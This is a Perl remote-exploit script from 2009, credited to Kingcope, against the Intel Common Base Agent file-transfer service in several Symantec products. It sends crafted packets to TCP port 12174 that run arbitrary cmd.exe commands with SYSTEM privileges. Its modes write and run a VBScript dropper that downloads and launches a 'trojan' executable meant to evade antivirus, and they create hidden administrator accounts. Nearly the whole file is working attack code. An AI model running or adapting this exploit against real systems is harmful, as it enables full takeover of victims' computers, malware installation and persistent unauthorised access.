# Title : Multiple Symantec Products Intel Common Base Agent Remote Command Execution
# Published : 2009-04-28
# Author : Kingcope
# The AMS2 (Alert Management Systems 2) component of multiple Symantec products is prone to a remote
# command-execution vulnerability because the software fails to adequately sanitize user-supplied
# input received by the Intel Common Base Agent / File Transfer listener on TCP port 12174 (the
# port this script connects to).
# Successfully exploiting this issue allows an attacker to execute arbitrary commands with
# SYSTEM-level privileges, completely compromising affected computers. Failed exploit attempts will
# result in a denial-of-service condition (the agent service crashes), so only run this against
# hosts you are explicitly authorized to test.
# # # # # # # # # # # # # # # # # # # # # # # # #
### SYMANTEC AV w/ INTEL FILE TRANSFER SERVICE
### REMOTE SYSTEM LEVEL EXPLOIT
### USE AT YOUR OWN RISK!
### by Kingcope in 2009
# # # # # # # # # # # # # # # # # # # # # # # # #
use IO::Socket;
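# Send one command line to the Intel File Transfer service (TCP/12174) and
# report whether the remote cmd.exe came back with the magic exit status.
#
# Parameters:
#   $target - host name or IP address of the Symantec/Intel agent
#   $cmmd   - command line to run through "cmd.exe /C" on the target; it is
#             interpolated verbatim, so cmd.exe metacharacters in it are live
#
# Prints "SUCCESS!" or "COMMAND FAILED" and returns nothing. If the port
# cannot be reached it prints "PORT CLOSED" and exits the whole script; every
# caller relies on that, so it is kept.
#
# Wire format as used here (no vendor documentation available): four NUL
# bytes, a little-endian 16-bit length covering the command plus its
# terminating NUL, then the NUL-terminated command. The 0x14-byte reply is
# assumed to carry the process exit code at offset 0x10, which is why the
# command is forced to end with a distinctive 32-bit exit value.
sub rce {
    my ($target, $cmmd) = @_;

    my $sock = IO::Socket::INET->new(
        PeerAddr => $target,
        PeerPort => '12174',
        Proto    => 'tcp',
    );
    unless ($sock) {
        print "PORT CLOSED\n";
        exit;
    }

    # Distinctive exit status so "the service answered" is distinguishable
    # from "our command actually ran". On 64-bit Perl "%d" yields
    # 3235296435, the decimal form of 0xc0d3b4b3 compared below; on 32-bit
    # Perl builds the conversion may not round-trip -- verify before
    # trusting the SUCCESS marker there.
    my $magic = sprintf("%d", 0xc0d3b4b3);
    my $cmd   = "cmd.exe /C $cmmd | exit $magic";

    # The length field is only 16 bits wide; refuse anything that would wrap
    # instead of sending a truncated/garbled packet.
    my $payload_len = length($cmd) + 1;    # +1 for the trailing NUL
    if ($payload_len > 0xFFFF) {
        print "COMMAND FAILED\n";
        close $sock;
        return;
    }
    my $req = "\x00\x00\x00\x00" . pack("v", $payload_len) . $cmd . "\x00";
    print {$sock} $req;

    # read() may return fewer bytes than asked for; collect up to 0x14 bytes
    # and stop on EOF or error rather than slicing a short buffer.
    my $res = '';
    while (length($res) < 0x14) {
        my $chunk;
        my $n = read($sock, $chunk, 0x14 - length($res));
        last if !defined $n || $n == 0;
        $res .= $chunk;
    }
    close $sock;

    if (length($res) < 0x14) {
        print "COMMAND FAILED\n";
        return;
    }

    # Compare against the explicit little-endian encoding; the original used
    # native-order "L", which only matched on little-endian hosts.
    my $status = substr($res, 0x10, 4);
    if ($status eq pack("V", 0xc0d3b4b3)) {
        print "SUCCESS!\n";
    } else {
        print "COMMAND FAILED\n";
    }
    return;
}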
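# Print the command-line synopsis to STDOUT and terminate the script.
# Called for any missing, extra or unrecognised argument.
sub usage {
    print "usage: perl xpl.pl [-a <target> <username> <password>] "
        . "[-a2 <target> <username> <password> <administrators groupname>] "
        . "[-d <target> <trojan url>] [-t <target>]\n";
    print "-a IS ADDUSER WITH SID METHOD\n";
    print "-a2 IS ADDUSER BY NAME\n";
    print "-t IS TEST\n";
    print "-d IS DOWNLOAD AND EXEC, EXE FILE MUST NOT BE DETECTABLE BY SYMANTEC AV\n";
    print "Example: perl xpl.pl -a www.symantec.com r00t p455\n";
    exit;
}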
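print "\n*** Symantec AV Remote Exploit\n*** by Kingcope in 2009\n\n";

# Argument layout: mode switch first, target host second, then the per-mode
# operands. Each mode is checked against the exact operand count it needs;
# an unknown switch also goes to usage() instead of silently doing nothing.
usage() if $#ARGV < 1;

my $specify = $ARGV[0];
my $target  = $ARGV[1];

# Expected value of $#ARGV (highest index) for each mode.
my %expected_last_index = (
    '-d'  => 2,    # target, trojan url
    '-a'  => 3,    # target, username, password
    '-a2' => 4,    # target, username, password, administrators groupname
    '-t'  => 1,    # target only
);
usage() unless exists $expected_last_index{$specify};
usage() if $#ARGV != $expected_last_index{$specify};

# Unbuffered STDOUT so each progress line shows before the blocking rce() call.
$| = 1;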
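if ($specify eq "-d") {
    my $trojanurl = $ARGV[2];
    my $script    = q{c:\getcreds.vbs};

    # VBScript dropper, one element per line, written to the target with a
    # chain of cmd.exe "echo" redirects. q{} keeps backslashes and embedded
    # double quotes literal; "^&" is cmd.exe's escape so echo emits a bare
    # "&" (VBScript string concatenation). $trojanurl is interpolated
    # unescaped into the HTTPDownload call: a URL containing a double quote
    # or an "&" breaks the generated script (same as the original).
    my @getcred = (
        q{Function SaveBinaryData(FileName, ByteArray)},
        q{Const adTypeBinary = 1},
        q{Const adSaveCreateOverWrite = 2},
        q{Dim BinaryStream},
        q{Set BinaryStream = CreateObject("ADODB.Stream")},
        q{BinaryStream.Type = adTypeBinary},
        q{BinaryStream.Open},
        q{BinaryStream.Write ByteArray},
        q{BinaryStream.SaveToFile FileName, adSaveCreateOverWrite},
        q{End Function},
        q{Sub HTTPDownload( myURL, myPath )},
        q{Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )},
        q{objHTTP.Open "GET", myURL, False},
        q{objHTTP.Send},
        q{SaveBinaryData myPath, objHTTP.ResponseBody},
        q{End Sub},
        qq{HTTPDownload "$trojanurl", "c:\\installer.exe"},
        q{Set shell = CreateObject("WScript.Shell")},
        q{Set objEnv = shell.Environment("Process")},
        q{Set objEnv2 = shell.Environment("User")},
        q{Set objEnv3 = shell.Environment("System")},
        q{sysRoot = objEnv("systemroot")},
        q{userProfile = objEnv("userprofile")},
        q{objEnv2("Path") = sysRoot ^& ";" ^& sysRoot ^&"\system32;" ^& sysRoot ^& "\temp;" ^& sysRoot ^& "\wbem"},
        q{objEnv3("Path") = sysRoot ^& ";" ^& sysRoot ^&"\system32;" ^& sysRoot ^& "\temp;" ^& sysRoot ^& "\wbem"},
        q{objEnv2("TEMP") = sysRoot ^& "\temp"},
        q{objEnv2("TMP") = sysRoot ^& "\temp"},
        q{objEnv3("TEMP") = sysRoot ^& "\temp"},
        q{objEnv3("TMP") = sysRoot ^& "\temp"},
        q{shell.CurrentDirectory = "c:\"},
        q{shell.Run Chr(34) ^& "c:\installer.exe" ^& Chr(34), 1, false},
        q{Set shell = Nothing},
    );

    # The first echo creates the file (">"), the rest append (">>").
    my @steps = map {
        sprintf('echo %s %s %s', $getcred[$_], ($_ == 0 ? '>' : '>>'), $script)
    } 0 .. $#getcred;
    my $commandx = join(' && ', @steps);

    print "UPLOAD AND RUN KIT .. ";
    # Invoking the .vbs path directly relies on the target's file association
    # for .vbs (normally wscript.exe); the original did the same.
    rce($target, "$commandx && $script");
    sleep(3);
    print "\n";
    print "DELETE KIT FETCHER .. ";
    rce($target, "del $script");
    print "COMPLETED....";
}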
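if ($specify eq "-a") {
    my $username = $ARGV[2];
    my $password = $ARGV[3];
    my $script   = q{c:\getcred.vbs};

    # VBScript that resolves the local Administrators group through its
    # well-known SID (S-1-5-32-544) -- so it works whatever the group is
    # called in the target's locale -- and adds the account passed as
    # Arguments(0) to it. q{} keeps backslashes and embedded quotes literal;
    # "^&" is cmd.exe's escape for "&" (VBScript concatenation). The WMI
    # moniker needs a literal "\\", which q{} collapses, hence "\\\\".
    my @getcreds = (
        q{strComputer = "."},
        q{strSID = "S-1-5-32-544"},
        q{Set objWMIService = GetObject("winmgmts:\\\\" ^& strComputer ^& "\root\cimv2")},
        q{Set objSID = objWMIService.Get("Win32_SID='" ^& strSID ^& "'")},
        q{groupname=objSID.AccountName},
        q{Set objNetwork = WScript.CreateObject("WScript.Network")},
        q{Set objGroup = GetObject("WinNT://" ^& objNetwork.ComputerName ^& "/"^&groupname^&",group")},
        q{Admin_Name = WScript.Arguments(0)},
        q{Path = "WinNT://" ^& objNetwork.ComputerName ^& "/" ^& Admin_Name},
        q{If Not objGroup.IsMember(Path) Then},
        q{objGroup.Add(Path)},
        q{End If},
        q{Set objGroup = Nothing},
        q{set objNetwork = Nothing},
    );

    # The first echo creates the file (">"), the rest append (">>").
    my @steps = map {
        sprintf('echo %s %s %s', $getcreds[$_], ($_ == 0 ? '>' : '>>'), $script)
    } 0 .. $#getcreds;
    my $commandxx = join(' && ', @steps);

    # Username and password are interpolated unescaped into the cmd.exe
    # line; values containing spaces or cmd metacharacters will not work.
    print "RUN ADD USER .. ";
    rce($target, "net user $username $password /add");
    sleep(3);
    print "\n";
    print "RUN ADD TO GROUP .. ";
    rce($target, "$commandxx && $script $username && del $script");
}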
if ($specify eq "-a2") {
    # Create a local account and put it straight into the administrators
    # group named on the command line (no SID lookup, so the group name
    # must match the target's locale). Both steps run in one cmd.exe line.
    my ($username, $password, $admin) = @ARGV[2 .. 4];
    my @steps = (
        "net user $username $password /add",
        "net localgroup $admin $username /add",
    );
    print "RUN ADD USER .. ";
    rce($target, join(" && ", @steps));
}
if ($specify eq "-t") {
    # Exploitability probe: a harmless echo whose exit status rce() reports
    # as SUCCESS! or COMMAND FAILED.
    my $probe = "echo ELITE .";
    print "RUN TEST $target .. ";
    rce($target, $probe);
}